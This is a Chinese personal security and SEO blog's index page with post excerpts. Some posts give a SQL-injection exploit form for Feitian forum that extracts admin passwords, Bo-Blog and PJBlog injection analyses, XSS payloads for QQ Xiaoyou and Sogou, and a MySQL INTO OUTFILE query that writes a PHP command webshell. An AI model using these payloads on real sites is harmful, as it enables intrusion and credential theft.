河北网络安全博客

河北博客是一个关注网络安全、网站设计、网站推广、网站优化SEO、网站建设的河北地方博客。


[置顶] 关于河北博客【想了解河北博客的朋友请看这里】

[置顶] 站长朋友请看这里【永久置顶】

【伯乐网征文】一个菜鸟站长的三年站长圈生活

diary

        我是2008年初开始走进站长这个圈子的,当时看着朋友们都在做网站,做程序,我也有点动心,想搞一个自己的小网站,因为这方面的基础有些欠缺,就用z-blog搭建了几个博客练手,发些文章,去朋友的博客留言回复,积攒了一些人气。

站长日常工作必备的十张记录单

diary

  目前站长行业里的基本情况是大家各自单打独斗,所谓“个人站长”很大程度上说明这个群体的生存状态:独立,个体,尚无团队。在这种状况下,日常工作的条理性显得非常重要,然而,对于庞大的网站工程来说,我们需要做的事情实在是太多太多,难免会有很多疏忽,俗话说好记性不如烂笔头,做好各项工作的记录就显得尤为重要,它能够让站长的工作更加实用化,具体化,系统化,最大化提高工作效率。以下是站长必备的十项记录单:

河北安全博客加入新城网链接

diary

        新城网,http://www.0311.com.cn,石家庄本地门户网站,0311是河北石家庄的区号。以下是新城网简介

建站吧关键字优化(一)

diary

   今年五一是第二次去女朋友家了,去年五一时第一次去的,时间过的真的很快,转眼一年,走的时候,希望建站吧河北安全博客回来时能给我个惊喜,今天回来,果然!呵呵,google关键字“建站吧”已经是第一位了。百度的关键字“建站吧”排在第二页第一位,不过收录的是走时刚刚加上的广告服务单页面,不过也不错了。满意!截图留念吧

河北安全博客关键字优化(一)

diary

河北安全博客关键字“河北博客”今天带来很多IP。我详细查看了一下,截图如下:在google搜索“河北博客”排名第三在百度搜索关键字“河北博客”网站排名第四 。

去除hdwiki“此词条来自互动百科联盟,详情请查阅XX”

diary

每个词条下面都有“此词条来自互动百科,详情请查阅:XXX”在根目录找到control文件夹在里面找到doc.php文件把doc.php下的eval($this->plugin['hdapi']['hooks']['uniontitle']);删掉 演示网站:建站百科

28句话让你的人际关系更上一层楼

diary

1.长相不令人讨厌,如果长得不好,就让自己有才气;如果才气也没有,那就总是微笑。
2.气质是关键。如果时尚学不好,宁愿纯朴。
3.与人握手时,可多握一会儿。真诚是宝。

飞天论坛asp版通杀 0day利用程序(官方漏洞未补)

buger

Copy code<center><H1>飞天论坛asp版通杀 0day利用程序</H1></center><form  method=post name="luoye">目标地址:<input name="act" type="text" id="act" size="140" value="http://www.kingwq.cn"><br><br>注入语句:<input type=text size=150 name=userid value="1 and 1=2 union select 1,2,admin_pwd,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,

...

Bo-Blog 2.0.3 注射漏洞

buger

//inc/mod_tag.php   
  
------------------------   
if (!defined('VALIDREQUEST')) die ('Access Denied.');   
  
if (!$job) $job='default';   
...

PJBlog注入漏洞

buger

影响版本:PJBlog 3.0.6.170
程序介绍:
PJBlog一套开源免费的中文个人博客系统程序,采用asp+Access的技术,具有相当高的运作效能以及更新率,也支持目前Blog所使用的新技术。


漏洞分析:
在文件class/cls_logAction.asp中:

oldcate=request.form("oldcate") //第429行
oldctype=request.form("oldtype")

...

windowsXPsp3IIS下载

windows

         windows环境:xp sp3

         iis版本:5.1 可升级至6.0但为英文版,5.1为虚拟目录操作

         附加:sql2000个人版安装即可在XP下使用

        测试结果:完全通过

...

“河北博客”关键词百度排名第一!

diary

   老习惯,看看今天的流量,今天的搜索引擎,今天的关键词。

   发现“河北博客”关键词,我就点开看看吧。。。   居然是第一位!

QQ校友XSS 0day及利用

buger

漏洞一:

qq校友 班级共享硬盘 上传文件时对文件描述没有做任何过滤,导致XSS。

qq校友使用了Ajax技术,来显示文件列表。在文件Msharemsg.js中使用innerHTML输出文件列表的HTML代码。由于使用了innerHTML,所以直接插入代码: <script>alert('kingwq')</script>不会被执行。使用下面的格式既可:<script defer>alert('kingwq')</script>。加入defer属性,那么浏览器在下载脚本的时候就不会立即对其进行处理,而是继续对页面进行下载和解析。这样我们插入的JavaScript就能正常运行。

...

运用Mysql语句生成后门具体方法

diary

通过MySQL(和PHP搭配之最佳组合) 的语句生成后门木马的方法:

SELECT * FROM `vbb_strikes` WHERE 1 union select
2,3,0x3C3F7068702073797374656D28245F52455155455
3545B636D645D293B3F3E
from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

  通过MySQL(和PHP搭配之最佳组合) 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:

...

Windows 7又曝新漏洞 可导致系统崩溃

buger

微软观察家Mary-Jo Foley今天在其博客中表示,众多Windows 7测试者近日发现Windows 7的一个漏洞,当他们使用微软的MSI安装程序启动Windows更新或安装任何软件时,发现系统将发生崩溃。不过众多测试者已经找到了修复该问题的办法。
  
    测试者Chris Holmes在博客中写到,当使用一个基于MSI的安装包时,许多用户发现explorer.exe和msiexec.exe都有可能出现问题。该漏洞有时候使用户不得不重新格式化硬盘后重新安装系统。
...

博客改版上线

diary

     今天把博客从新修改了,毕竟是刚从沙盒出来,GG收录减少了近3倍。

这是一个崭新的开始!   欢迎大家光临!

sougou跨站漏洞

buger

跨站页面:http://bbs.sogou.com/

选中帖子搜索,在搜索框输入跨转语句

给出两个例子

<script>alert('test')</script> 


<iframe src=http://www.kingwq.cn/></iframe>

重复标题问题解决

diary

    在月份归档处总是出现重复的标题标记,搜索了N多也未解决

    只有自己研究了

   现在给大家说一下修改方法,具体代码参照

只能catalog.html及其相关模板中引用

...

标签

都是插件惹的祸

diary

       一直无法实现静态页面生成分页目录显示。原来是插件titleSEO在搞鬼。

         停用! 这次问题解决了!

恭喜本站进入GG沙盒

diary

先汗一个

昨天晚上照例检查流量,发现流量骤小,从而还是按照习惯,GG搜索kingwq进入博客,发现居然在第一位消失了,到了第二页第一位,也就是第11位了,从而又急site:www.kingwq.cn正常收录,有点意思了,这是为什么呢?

GG一番搜索,得出结论,本站顺利进入GG沙盒!

GG沙盒是什么东东?先来隆重介绍一下!

...

这是为什么呢?

diary

    刚打开博客一看,老习惯,GG,单搜kingwq

    没了!再一翻,跑第二页了,拉风的石家庄安全博客也不存在了,赶紧查了下PR,没变。。。

   太晚了,明天再看看到底这是为什么

分页:1[2][3][4]

订阅河北博客

  • 订阅我的博客:订阅我的博客
  • 关注新浪微博:关注新浪微博
  • 关注腾讯微博:关注腾讯微博
  • google reader
  • 鲜果
  • 抓虾
  • QQ邮箱

河北博客站内搜索

河北博客相关链接

河北博客热文排行

Powered By kingwq's blog

本站采用创作共用版权协议, 要求署名、非商业用途和保持一致. 转载本站内容必须也遵循“署名-非商业用途-保持一致”的创作共用协议.
This site is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 2.5 License.冀ICP备09002514号.Copyright www.kingwq.cn.2010